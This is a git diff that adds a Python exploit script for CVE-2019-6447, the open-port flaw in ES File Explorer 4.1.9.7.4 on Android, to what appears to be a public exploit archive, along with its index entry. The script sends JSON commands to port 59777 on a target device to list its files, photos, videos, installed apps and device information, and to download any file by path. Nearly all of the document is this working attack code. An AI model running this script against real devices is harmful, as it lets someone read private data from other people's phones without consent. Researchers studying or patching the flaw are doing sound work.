diff --git a/exploits/android/remote/50070.py b/exploits/android/remote/50070.py new file mode 100755 index 000000000..3d22d4d56 --- /dev/null +++ b/exploits/android/remote/50070.py @@ -0,0 +1,86 @@ +# Exploit Title: ES File Explorer 4.1.9.7.4 - Arbitrary File Read +# Date: 29/06/2021 +# Exploit Author: Nehal Zaman +# Version: ES File Explorer v4.1.9.7.4 +# Tested on: Android +# CVE : CVE-2019-6447 + +import requests +import json +import ast +import sys + +if len(sys.argv) < 3: + print(f"USAGE {sys.argv[0]} [file to download]") + sys.exit(1) + +url = 'http://' + sys.argv[2] + ':59777' +cmd = sys.argv[1] +cmds = ['listFiles','listPics','listVideos','listAudios','listApps','listAppsSystem','listAppsPhone','listAppsSdcard','listAppsAll','getFile','getDeviceInfo'] +listCmds = cmds[:9] +if cmd not in cmds: + print("[-] WRONG COMMAND!") + print("Available commands : ") + print(" listFiles : List all Files.") + print(" listPics : List all Pictures.") + print(" listVideos : List all videos.") + print(" listAudios : List all audios.") + print(" listApps : List Applications installed.") + print(" listAppsSystem : List System apps.") + print(" listAppsPhone : List Communication related apps.") + print(" listAppsSdcard : List apps on the SDCard.") + print(" listAppsAll : List all Application.") + print(" getFile : Download a file.") + print(" getDeviceInfo : Get device info.") + sys.exit(1) + +print("\n==================================================================") +print("| ES File Explorer Open Port Vulnerability : CVE-2019-6447 |") +print("| Coded By : Nehal a.k.a PwnerSec |") +print("==================================================================\n") + +header = {"Content-Type" : "application/json"} +proxy = {"http":"http://127.0.0.1:8080", "https":"https://127.0.0.1:8080"} + +def httpPost(cmd): + data = json.dumps({"command":cmd}) + response = requests.post(url, headers=header, data=data) + return ast.literal_eval(response.text) + +def parse(text, keys): + for dic in text: + for key in keys: + print(f"{key} : {dic[key]}") + print('') + +def do_listing(cmd): + response = httpPost(cmd) + if len(response) == 0: + keys = [] + else: + keys = list(response[0].keys()) + parse(response, keys) + +if cmd in listCmds: + do_listing(cmd) + +elif cmd == cmds[9]: + if len(sys.argv) != 4: + print("[+] Include file name to download.") + sys.exit(1) + elif sys.argv[3][0] != '/': + print("[-] You need to provide full path of the file.") + sys.exit(1) + else: + path = sys.argv[3] + print("[+] Downloading file...") + response = requests.get(url + path) + with open('out.dat','wb') as wf: + wf.write(response.content) + print("[+] Done. Saved as `out.dat`.") + +elif cmd == cmds[10]: + response = httpPost(cmd) + keys = list(response.keys()) + for key in keys: + print(f"{key} : {response[key]}") \ No newline at end of file diff --git a/files_exploits.csv b/files_exploits.csv index 5f08fe159..9f234fed9 100644 --- a/files_exploits.csv +++ b/files_exploits.csv @@ -18511,6 +18511,7 @@ id,file,description,date,author,type,platform,port 49936,exploits/hardware/remote/49936.py,"CHIYU IoT Devices - 'Telnet' Authentication Bypass",2021-06-03,sirpedrotavares,remote,hardware, 50034,exploits/hardware/remote/50034.txt,"Dlink DSL2750U - 'Reboot' Command Injection",2021-06-18,"Mohammed Hadi",remote,hardware, 50039,exploits/solaris/remote/50039.py,"Solaris SunSSH 11.0 x86 - libpam Remote Root (3)",2021-06-21,"Nathaniel Singer",remote,solaris, +50070,exploits/android/remote/50070.py,"ES File Explorer 4.1.9.7.4 - Arbitrary File Read",2021-06-29,"Nehal Zaman",remote,android, 6,exploits/php/webapps/6.php,"WordPress Core 2.0.2 - 'cache' Remote Shell Injection",2006-05-25,rgod,webapps,php, 44,exploits/php/webapps/44.pl,"phpBB 2.0.5 - SQL Injection Password Disclosure",2003-06-20,"Rick Patel",webapps,php, 47,exploits/php/webapps/47.c,"phpBB 2.0.4 - PHP Remote File Inclusion",2003-06-30,Spoofed,webapps,php,